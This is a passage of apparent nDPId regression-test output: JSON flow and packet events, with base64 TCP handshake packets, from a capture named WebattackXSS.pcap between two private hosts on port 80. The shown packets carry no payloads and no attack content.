-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347733083,"flow_last_seen":1499347738820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347734348,"flow_last_seen":1499347739820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347734348,"flow_last_seen":1499347739820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7383,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347855324,"flow_last_seen":1499347855324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347855324,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7383,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1499347855324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347855324,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82qpAAD4G6yWsEAABwKgKMoJ8AFBnHpBuAAAAAKACchCYqgAAAgQFtAQCCAoBPErEAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7384,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":2,"flow_last_seen":1499347855324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347855324,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgnxQBHT\/Zx6Qb6AScSC0ZwAAAgQFtAQCCAoD5hw4ATxKxAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":3,"flow_last_seen":1499347855325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347855325,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02qtAAD4G6yysEAABwKgKMoJ8AFBnHpBvUAR1AIAQAOVTbwAAAQEICgE8SsQD5hw4"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347856593,"flow_last_seen":1499347856593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347856593,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1499347856593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347856593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8fnJAAD4GR16sEAABwKgKMoKKAFBRAjJzAAAAAKACchALdwAAAgQFtAQCCAoBPEwBAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":2,"flow_last_seen":1499347856593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347856593,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgooY0Yx1UQIydKAScSBFtAAAAgQFtAQCCAoD5h11ATxMAQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7397,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":3,"flow_last_seen":1499347856593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347856593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0fnNAAD4GR2WsEAABwKgKMoKKAFBRAjJ0GNGMdoAQAOXkuwAAAQEICgE8TAED5h11"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7416,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347859192,"flow_last_seen":1499347859192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347859192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7416,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1499347859192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347859192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PBpAAD4GibasEAABwKgKMoKkAFB0dnKRAAAAAKACchClQAAAAgQFtAQCCAoBPE6LAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7417,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":2,"flow_last_seen":1499347859192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347859192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgqTwonDidHZykqAScSAgtQAAAgQFtAQCCAoD5h\/\/ATxOiwEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":3,"flow_last_seen":1499347859192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347859192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PBtAAD4Gib2sEAABwKgKMoKkAFB0dnKS8KJw44AQAOW\/vAAAAQEICgE8TosD5h\/\/"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347860489,"flow_last_seen":1499347860489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347860489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1499347860489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347860489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA842JAAD4G4m2sEAABwKgKMoKyAFDBtqytAAAAAKACchAckgAAAgQFtAQCCAoBPE\/PAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":2,"flow_last_seen":1499347860489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347860489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgrJy9x5\/wbasrqAScSBm0QAAAgQFtAQCCAoD5iFDATxPzwEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7427,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":3,"flow_last_seen":1499347860490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347860490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA042NAAD4G4nSsEAABwKgKMoKyAFDBtqyucvcegIAQAOUF2QAAAQEICgE8T88D5iFD"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7437,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347861783,"flow_last_seen":1499347861783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347861783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7437,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1499347861783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347861783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lM1AAD4GMQOsEAABwKgKMoLAAFBG1cXfAAAAAKACchB88AAAAgQFtAQCCAoBPFESAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":2,"flow_last_seen":1499347861783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347861783,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgsCSqnQ8RtXF4KAScSBQewAAAgQFtAQCCAoD5iKHATxREgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":3,"flow_last_seen":1499347861784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347861784,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lM5AAD4GMQqsEAABwKgKMoLAAFBG1cXgkqp0PYAQAOXvgQAAAQEICgE8URMD5iKH"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7449,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347863072,"flow_last_seen":1499347863072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347863072,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7449,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1499347863072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347863072,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NydAAD4GjqmsEAABwKgKMoLOAFBzZGVyAAAAAKACchCvfQAAAgQFtAQCCAoBPFJVAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7450,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":2,"flow_last_seen":1499347863073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347863073,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgs7A+ay+c2Rlc6AScSAa9QAAAgQFtAQCCAoD5iPJATxSVQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":3,"flow_last_seen":1499347863073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347863073,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NyhAAD4GjrCsEAABwKgKMoLOAFBzZGVzwPmsv4AQAOW5\/AAAAQEICgE8UlUD5iPJ"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7458,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347864367,"flow_last_seen":1499347864367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864367,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7458,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1499347864367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347864367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SwNAAD4Ges2sEAABwKgKMoLcAFBKORibAAAAAKACchAkLwAAAgQFtAQCCAoBPFOYAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7459,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":2,"flow_last_seen":1499347864367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347864367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgtztJOKwSjkYnKAScSAsRQAAAgQFtAQCCAoD5iUNATxTmAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7461,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":3,"flow_last_seen":1499347864368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347864368,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SwRAAD4GetSsEAABwKgKMoLcAFBKORic7STisYAQAOXLSwAAAQEICgE8U5kD5iUN"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347675703,"flow_last_seen":1499347745908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232186,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347735664,"flow_last_seen":1499347740821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347735664,"flow_last_seen":1499347740821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347738229,"flow_last_seen":1499347743822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347738229,"flow_last_seen":1499347743822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347739497,"flow_last_seen":1499347744823,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347739497,"flow_last_seen":1499347744823,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347867086,"flow_last_seen":1499347867086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347867086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1499347867086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347867086,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sxZAAD4GErqsEAABwKgKMoL2AFBvHeVWAAAAAKACchAvzQAAAgQFtAQCCAoBPFZAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7483,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":2,"flow_last_seen":1499347867086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347867086,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgvZcEWBbbx3lV6AScSBIpAAAAgQFtAQCCAoD5ie1ATxWQAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":3,"flow_last_seen":1499347867087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347867087,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sxdAAD4GEsGsEAABwKgKMoL2AFBvHeVXXBFgXIAQAOXnqwAAAQEICgE8VkAD5ie1"} 